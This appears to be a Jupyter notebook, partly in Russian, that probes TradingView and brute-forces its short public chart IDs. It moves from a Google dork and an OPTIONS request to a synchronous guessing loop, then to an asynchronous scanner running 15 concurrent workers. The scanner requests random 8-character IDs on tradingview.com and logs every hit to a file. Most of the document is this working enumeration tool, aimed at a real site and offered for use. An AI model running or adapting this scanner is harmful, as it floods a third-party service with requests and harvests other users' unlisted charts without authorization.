## Public charts

TradingView присваивает слишком короткий UUID для публичных чартов, делая его доступным для перебора.

В `robots.txt` нет правила для пути `/chart/`, но дорка `site:tradingview.com inurl:chart/* -support -script` выдает только пользовательскую аналитику по торговым парам.

In [1]:
import requests
from urllib.parse import urljoin, urlparse
from itertools import product
from string import ascii_letters, digits

In [2]:
# Base URL of a chart page; a chart id is appended to it with urljoin().
CHART_URL = 'https://www.tradingview.com/chart/'
# Presumably the URL prefix for chart images; not referenced in the visible
# cells -- TODO confirm intended use.
CHART_IMG = 'https://ru.tradingview.com/i/'
# Sample chart id; its length also sets the length of generated candidate ids.
TEST = 'l4BkzZou'
# Caps the brute-force loop while debugging.
DEBUG_ATTEMPTS = 10

# Status codes the scan expects; valid() rejects any response outside this list.
status_codes = [200, 403, 404]
# Alphabet for candidate ids: ASCII letters (both cases) plus digits.
charset = ascii_letters + digits

In [3]:
len(TEST)

8

Запрашиваю `HTTP OPTIONS`, чтобы увидеть, доступен ли метод `HEAD` для снижения нагрузки на сеть.

Метод недоступен (ответ `301`), но обнаружена [смешнявка](https://ru.tradingview.com/csp-report/).

In [5]:
# Send the OPTIONS probe through a session that is closed afterwards, so the
# pooled connection is released instead of lingering until garbage collection.
with requests.Session() as session:
    r = session.options(CHART_URL)

In [6]:
print(r.text)

<!DOCTYPE html>
<html lang="en" dir="ltr"
 class="is-not-authenticated is-not-pro is-not-trial ">
<head>
	<script nonce="IZsCuuI8Ny4ecQMdG+VL+w==">
		var environment = 'battle';
		window.WS_HOST_PING_REQUIRED = true;
		window.BUILD_TIME = '2021_10_22-11_20';
		window.WEBSOCKET_HOST = 'data.tradingview.com';
		window.WEBSOCKET_PRO_HOST = 'prodata.tradingview.com';
		window.TradingView = window.TradingView || {};

	TradingView.onChartPage = true;
	</script>
	<script nonce="IZsCuuI8Ny4ecQMdG+VL+w==">
		!function(){"use strict";function t(t,e=!1){const{searchParams:s}=new URL(String(location)),n=function(t){const e=t+"=",s=document.cookie.split(";");for(let t=0;t<s.length;t++){let n=s[t];for(;" "===n.charAt(0);)n=n.substring(1,n.length);if(0===n.indexOf(e))return n.substring(e.length,n.length)}return null}("tv_app")||"";let o="true"===s.get("mobileapp_new"),i="true"===s.get("mobileapp");return e||(o||(o=["android","android_nps"].includes(n)),i||(i="ios"===n)),!("new"!==t&&"any"!==t||!o)||!

In [7]:
help(r)

Help on Response in module requests.models object:

class Response(builtins.object)
 |  The :class:`Response <Response>` object, which contains a
 |  server's response to an HTTP request.
 |  
 |  Methods defined here:
 |  
 |  __bool__(self)
 |      Returns True if :attr:`status_code` is less than 400.
 |      
 |      This attribute checks if the status code of the response is between
 |      400 and 600 to see if there was a client error or a server error. If
 |      the status code, is between 200 and 400, this will return True. This
 |      is **not** a check to see if the response code is ``200 OK``.
 |  
 |  __enter__(self)
 |  
 |  __exit__(self, *args)
 |  
 |  __getstate__(self)
 |  
 |  __init__(self)
 |      Initialize self.  See help(type(self)) for accurate signature.
 |  
 |  __iter__(self)
 |      Allows you to use a response as an iterator.
 |  
 |  __nonzero__(self)
 |      Returns True if :attr:`status_code` is less than 400.
 |      
 |      This attribute checks if

In [8]:
r.headers

{'Content-Type': 'text/html; charset=utf-8', 'Transfer-Encoding': 'chunked', 'Connection': 'keep-alive', 'Date': 'Sat, 23 Oct 2021 13:26:31 GMT', 'Vary': 'Accept-Encoding, Cookie', 'Expires': 'Sat, 23 Oct 2021 13:28:31 GMT', 'Cache-Control': 'max-age=120', 'Content-Security-Policy': "script-src 'self' 'unsafe-eval' blob: https://*.tradingview.com/ https://www.recaptcha.net/recaptcha/ https://www.gstatic.com/recaptcha/ https://maps.googleapis.com/ https://www.google-analytics.com/ https://www.googletagmanager.com/gtag/ https://*.doubleclick.net/ https://*.googleadservices.com/ https://adservice.google.com/ https://*.googlesyndication.com/ https://*.ampproject.org/ https://accounts.google.com/ https://pay.google.com/ https://*.paypal.com/ https://platform.twitter.com 'nonce-IZsCuuI8Ny4ecQMdG+VL+w=='; default-src 'self' https: data: blob: wss: 'unsafe-inline'; report-uri /csp-report/", 'X-Frame-Options': 'DENY', 'Referrer-Policy': 'origin-when-cross-origin', 'X-Content-Type-Options': 'nos

In [9]:
# Fetch the known-good sample chart; the session is closed once the response
# body has been read, releasing its pooled connection.
with requests.Session() as session:
    chart = session.get(urljoin(CHART_URL, TEST))

In [10]:
chart.status_code

200

In [11]:
chart.ok

True

Первый запуск показал, что сервер возвращает `200` на UUID любого валидного объекта, а не только чарта.

In [12]:
def ajax_path(response):
    """Return the value of the last ``data-ajax-path`` attribute in the page.

    Args:
        response: Any object with a ``text`` attribute holding the HTML body
            (e.g. a ``requests.Response``).

    Returns:
        The attribute value without its surrounding quotes, or ``''`` when the
        page contains no quoted ``data-ajax-path`` attribute.
    """
    import re  # local import: the notebook's import cell does not load `re`

    # Match the quoted value explicitly instead of splitting on whitespace, so
    # a value followed directly by `>` or containing spaces is still extracted
    # cleanly, and a page without the attribute yields '' rather than garbage.
    matches = re.findall(r'''data-ajax-path=(["'])(.*?)\1''', response.text)
    return matches[-1][1] if matches else ''

In [13]:
ajax_path(requests.Session().get(urljoin(CHART_URL, 'aaaaaaah')))

'/ideas/aaaaaaah/ideas/main/'

In [14]:
def no_redirect(chart):
    """Tell whether the page was NOT redirected to an idea or a script.

    Args:
        chart: Response for a ``/chart/<id>`` request; its ajax path is read
            with ``ajax_path``.

    Returns:
        ``True`` when the first segment of the ajax path is neither ``ideas``
        nor ``script``, ``False`` otherwise.
    """
    redirects = ('ideas', 'script')
    # The ajax path starts with '/', so a plain split('/') yields '' as its
    # first element; drop the leading slash before taking the first segment.
    first_segment = ajax_path(chart).lstrip('/').split('/', 1)[0]
    # NOTE(review): the original tested `in redirects`, which contradicts the
    # function name; `not in` matches "no redirect" -- confirm the intent.
    return first_segment not in redirects

def valid(chart):
    """Decide whether a response belongs to a real chart page.

    Args:
        chart: ``requests.Response`` for a ``/chart/<id>`` request.

    Returns:
        ``True`` when the response is successful and was not redirected to
        another object type (see ``no_redirect``), ``False`` otherwise.  The
        caller relies on this value to decide whether to record the id.

    Raises:
        AssertionError: The status code is not one of ``status_codes``.
    """
    # Raised explicitly (same exception type as the former `assert`) so the
    # check is not stripped when Python runs with -O.
    if chart.status_code not in status_codes:
        raise AssertionError(f'Get unknown status code: {chart.status_code}')
    is_chart = bool(chart.ok and no_redirect(chart))
    if is_chart:
        # Report the hit from the response itself instead of reading a global
        # loop variable that may not exist when the function is called alone.
        print(chart.url)
    return is_chart

In [15]:
import time

In [None]:
# Brute-force scan: walk candidate ids in lexicographic order and remember the
# ones that valid() accepts.  Maps id -> HTTP status code.
charts = {}
# A single session is shared by all requests so the connection is reused, and
# the `with` block closes it when the scan ends.
with requests.Session() as session:
    for i, attempt in enumerate(product(charset, repeat=len(TEST))):
        # Check the limit before sending, so exactly DEBUG_ATTEMPTS requests
        # are made (checking afterwards sent one extra request).
        if i >= DEBUG_ATTEMPTS:
            break
        uuid = ''.join(attempt)
        # The timeout keeps one stalled connection from hanging the whole scan.
        chart = session.get(urljoin(CHART_URL, uuid), timeout=10)
        if valid(chart):
            charts[uuid] = chart.status_code

Приведём полученный скрипт к асинхронному виду.

In [17]:
import asyncio
import aiohttp
import nest_asyncio
import random
import string
from datetime import datetime 

nest_asyncio.apply() # avoids a RuntimeError when running inside the notebook

In [None]:
def logger(msg, source):
    """Print *msg* on one line, prefixed with the current time and *source*."""
    fields = (datetime.now(), "| msg from", source, ":", msg)
    print(" ".join(str(field) for field in fields))

    
def logger_worker(msg, worker_id):
    """Log *msg* with the worker's number as the message source."""
    origin = f"worker №{worker_id!s}"
    logger(msg, origin)


def save_url(url):
    """Append *url* to ``URLs.txt`` in the working directory.

    Each call adds one line of the form ``<timestamp>: <url>``.

    Args:
        url: Text to record.
    """
    # `with` closes the file even if the write fails; the explicit encoding
    # keeps the output independent of the platform's default.
    with open("URLs.txt", "a", encoding="utf-8") as f:
        f.write(f"{datetime.now()}: {url}\n")


def get_random_string(length=8):
    """Return a random candidate id.

    Args:
        length: Number of characters to generate; defaults to 8.

    Returns:
        A string of *length* characters drawn (with replacement) from
        ``A-Z``, ``0-9`` and ``a-z``.
    """
    alphabet = string.ascii_uppercase + string.digits + string.ascii_lowercase
    return ''.join(random.choices(alphabet, k=length))


# Number of requests completed since the last report; incremented by the
# workers and reset by measure_runtime().
metrics = 0


async def measure_runtime(interval=10):
    """Log the average request rate every *interval* seconds, forever.

    Args:
        interval: Seconds between two reports; also the divisor used to turn
            the request count into a per-second rate.  Defaults to 10.

    The coroutine never returns on its own; it resets the global ``metrics``
    counter after every report.
    """
    global metrics
    while True:
        await asyncio.sleep(interval)
        logger("avrg requests per second: "+ str(metrics/interval), "runtime measurer")
        metrics = 0
    
    

async def worker(id):
    """Probe random chart ids in an endless loop and record ids answered with 200.

    Args:
        id: Worker number, used only to tag log messages.  The name shadows
            the builtin but is kept so existing callers keep working.

    Every completed request increments the global ``metrics`` counter.  The
    coroutine never returns on its own; "done" is logged when it is cancelled
    or an unexpected exception escapes.
    """
    global metrics
    logger_worker("ready", id)
    try:
        async with aiohttp.ClientSession() as session:
            while True:
                val = get_random_string()
                try:
                    async with session.get('https://www.tradingview.com/chart/' + val) as resp:
                        if resp.status == 200:
                            logger_worker("found valid url at /"+ val, id)
                            save_url(val)
                        metrics += 1
                except (aiohttp.ClientError, asyncio.TimeoutError) as err:
                    # A transient network failure must not end the worker.
                    logger_worker("request failed: " + repr(err), id)
                    # Brief pause so a dead connection is not retried in a hot loop.
                    await asyncio.sleep(1)
    finally:
        # The loop never exits normally, so a statement placed after it would be
        # unreachable; `finally` runs on cancellation or unexpected errors.
        logger_worker("done", id)

async def main(number_of_workers):
    """Run the rate reporter and *number_of_workers* workers concurrently.

    Args:
        number_of_workers: How many ``worker`` coroutines to start.

    Raises:
        Exception: Whatever the first failing task raised.
    """
    tasks = [asyncio.create_task(measure_runtime())]
    tasks.extend(asyncio.create_task(worker(w)) for w in range(number_of_workers))

    # gather() propagates the first exception from ANY task.  Awaiting the
    # tasks one by one would block on the first, never-ending reporter task
    # and leave crashed workers unnoticed.
    await asyncio.gather(*tasks)

# Launch the scan with 15 concurrent workers.
asyncio.run(main(15))